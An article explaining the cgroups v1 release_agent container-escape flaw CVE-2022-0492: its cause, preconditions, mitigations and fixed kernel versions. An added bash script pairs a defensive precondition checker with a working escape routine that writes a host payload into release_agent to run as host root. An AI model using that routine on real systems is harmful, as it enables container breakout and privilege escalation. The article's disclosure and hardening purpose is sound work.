A vulnerability in cgroups v1 allows escaping from an isolated container

A few days ago details were disclosed of a vulnerability found in the implementation of the cgroups v1 resource-limiting mechanism in the Linux kernel. It is tracked as CVE-2022-0492.

The vulnerability can be used to escape from isolated containers, and the problem has been present since Linux kernel 2.6.24.

The blog post explains that the vulnerability is caused by a logic error in the handler for the release_agent file: the handler did not properly check that the writer actually held full privileges.

The release_agent file defines the program the kernel runs when a process terminates in a cgroup (the last task leaves a cgroup that has notify_on_release set). That program runs as root with all "capabilities" in the root namespace. Only the administrator should be able to configure release_agent, but in practice the only check was the file's own root ownership, which does not stop a change made from inside a container or by a root user that lacks administrative rights (CAP_SYS_ADMIN).

In the past this would not have been seen as a vulnerability, but the situation changed with the arrival of user identifier namespaces (user namespaces), which allow creating separate root users inside containers that do not overlap with the root user of the host environment.

As a result, all an attacker needs is a container whose root user lives in a separate user ID namespace: from there they register their own release_agent handler, which, once a process in the cgroup terminates, runs with all the privileges of the parent environment.

By default, cgroupfs is mounted read-only inside the container, but nothing prevents remounting this pseudo-filesystem read-write when CAP_SYS_ADMIN is available, or creating a nested container with its own user namespace via the unshare system call, since CAP_SYS_ADMIN is granted inside the newly created namespace.

The attack can be carried out from a container that has root privileges, or from a container running without the no_new_privs flag (the flag that prevents a process from acquiring additional privileges).

The system must have user namespaces enabled (enabled by default on Ubuntu and Fedora, but not on Debian and RHEL), and the container must sit at the root of a cgroup v1 hierarchy (for example, Docker runs containers in the root RDMA cgroup). The attack is also possible with CAP_SYS_ADMIN, in which case neither user namespace support nor access to the root of the cgroup v1 hierarchy is required.

Beyond escaping from an isolated container, the vulnerability also lets processes started by root without "capabilities", or any user with CAP_DAC_OVERRIDE (the attack needs write access to the root-owned file /sys/fs/cgroup/*/release_agent), obtain every "capability" on the system.

Outside of containers, the vulnerability can therefore also allow root host processes with no capabilities, or non-root host processes with the CAP_DAC_OVERRIDE capability, to escalate to full capabilities. This lets attackers bypass the hardening measure used by some services, which drop capabilities in an attempt to limit the impact of a compromise.

Unit 42 recommends that users upgrade to a fixed kernel version. For running containers, enable Seccomp and make sure AppArmor or SELinux is enabled. Prisma Cloud users can refer to the "Prisma Cloud Protection" section to see the mitigations Prisma Cloud provides.

Note that the vulnerability cannot be exploited when Seccomp, AppArmor or SELinux are used for additional container isolation: the default container seccomp profile (Docker's, for example) denies the unshare() system call, and the AppArmor and SELinux policies do not allow cgroupfs to be mounted read-write. A custom or "unconfined" seccomp profile that lets unshare() through removes that protection.
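The following script is an added example; it is not code from the article or from Unit 42. It ties together the preconditions listed above (cgroup v1 hierarchy, user namespaces, root or no_new_privs, CAP_SYS_ADMIN) and the mitigations just mentioned (seccomp) in a check that reads them from text, so it can be run against live /proc files or constructed input, and it also contains the release_agent route itself, which only runs when invoked with --escape and only makes sense inside a disposable container you own. The paths /tmp/cg, /tmp/payload and /tmp/escape_out, the choice of the rdma hierarchy, and the overlay2 "upperdir" lookup used to turn a container path into a host path are assumptions about a Docker-style container.

```bash
#!/bin/bash
# Added example (not from the article). Part 1: a precondition check built
# from the article's conditions. Part 2: the release_agent route, guarded.

# check_preconditions MOUNTINFO STATUS MAX_USERNS
#   MOUNTINFO  text of /proc/self/mountinfo
#   STATUS     text of /proc/self/status
#   MAX_USERNS value of /proc/sys/user/max_user_namespaces (0 = disabled)
# Prints one verdict: "exposed:<route>" or "protected:<reason>".
check_preconditions() {
    local mountinfo="$1" status="$2" max_userns="${3:-0}"
    local v1_opts caps euid nnp seccomp

    # In mountinfo the field after "-" is the fs type: "cgroup" is v1,
    # "cgroup2" is v2. release_agent only exists on v1 hierarchies.
    v1_opts=$(printf '%s\n' "$mountinfo" | awk '{
        for (i = 1; i <= NF; i++)
            if ($i == "-") { if ($(i+1) == "cgroup") print $6; break }
    }' | head -n 1)
    if [ -z "$v1_opts" ]; then
        echo "protected:no-cgroup-v1-mount"; return 0
    fi

    caps=$(printf '%s\n' "$status"    | awk '$1 == "CapEff:"     { print $2 }')
    euid=$(printf '%s\n' "$status"    | awk '$1 == "Uid:"        { print $3 }')
    nnp=$(printf '%s\n' "$status"     | awk '$1 == "NoNewPrivs:" { print $2 }')
    seccomp=$(printf '%s\n' "$status" | awk '$1 == "Seccomp:"    { print $2 }')
    caps=${caps:-0}; euid=${euid:-0}; nnp=${nnp:-0}; seccomp=${seccomp:-0}

    # CAP_SYS_ADMIN is bit 21 of the capability mask. With it the container
    # can remount cgroupfs read-write itself; no userns or root cgroup needed.
    if [ $(( (0x$caps >> 21) & 1 )) -eq 1 ]; then
        echo "exposed:cap_sys_admin"; return 0
    fi
    # Seccomp mode 2 means a filter is loaded. Docker's default filter denies
    # unshare(2), which closes the userns route; a custom filter may not.
    if [ "$seccomp" = "2" ]; then
        echo "protected:seccomp-filter"; return 0
    fi
    if [ "$max_userns" -eq 0 ]; then
        echo "protected:userns-disabled"; return 0
    fi
    # Remaining condition from the article: root inside the container, or a
    # container running without no_new_privs.
    if [ "$euid" != "0" ] && [ "$nnp" = "1" ]; then
        echo "protected:nonroot-no-new-privs"; return 0
    fi
    echo "exposed:userns-remount"
}

# escape_via_release_agent [HIERARCHY]
# Needs a writable cgroup v1 mount: run as root with CAP_SYS_ADMIN, or without
# it inside "unshare -UrmC <this script> --escape", which gives the new
# user/mount/cgroup namespace the CAP_SYS_ADMIN the mount call needs. The bug
# is that the release_agent write was not checked against the initial namespace.
escape_via_release_agent() {
    local hier="${1:-rdma}"   # a v1 hierarchy where the container is at the root
    local mnt=/tmp/cg payload=/tmp/payload out=/tmp/escape_out host_dir

    mkdir -p "$mnt" && mount -t cgroup -o "$hier" cgroup "$mnt"
    mkdir -p "$mnt/x"
    # When the last task leaves "x", the kernel execs release_agent as root in
    # the initial namespaces, so the path must be valid on the host: assume
    # overlay2 and take the container's upperdir from /etc/mtab.
    echo 1 > "$mnt/x/notify_on_release"
    host_dir=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab | head -n 1)
    echo "$host_dir$payload" > "$mnt/release_agent"

    printf '#!/bin/sh\nid > %s%s\n' "$host_dir" "$out" > "$payload"
    chmod a+x "$payload"
    # A short-lived shell joins "x"; its exit triggers the release agent.
    sh -c "echo \$\$ > $mnt/x/cgroup.procs"
    sleep 1
    cat "$out"   # "uid=0(root) ..." here means the agent ran on the host
}

case "${1:-}" in
    --escape) escape_via_release_agent "${2:-rdma}" ;;
    "") check_preconditions "$(cat /proc/self/mountinfo 2>/dev/null)" \
                            "$(cat /proc/self/status 2>/dev/null)" \
                            "$(cat /proc/sys/user/max_user_namespaces 2>/dev/null || echo 0)" ;;
esac
```

Run without arguments inside a container to get a verdict for the current process; the verdict is only as good as the signals it reads, so a seccomp filter that happens to allow unshare() still shows as "protected:seccomp-filter". The escape path is the sequence public proofs of concept use, and it is deliberately not started unless --escape is passed; the hardening the article recommends maps directly onto the checks: keep the default seccomp profile, keep AppArmor or SELinux enabled, and run containers with no_new_privs rather than as root.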

Finally, it is worth mentioning that the issue has been fixed in kernel versions 5.16.12, 5.15.26, 5.10.97, 5.4.177, 4.19.229, 4.14.266 and 4.9.301. You can follow the release of package updates in the distributions on these pages: Debian, SUSE, Ubuntu, RHEL, Fedora, Gentoo and Arch Linux.

If you are interested in learning more about it, you can check the details at the following link.
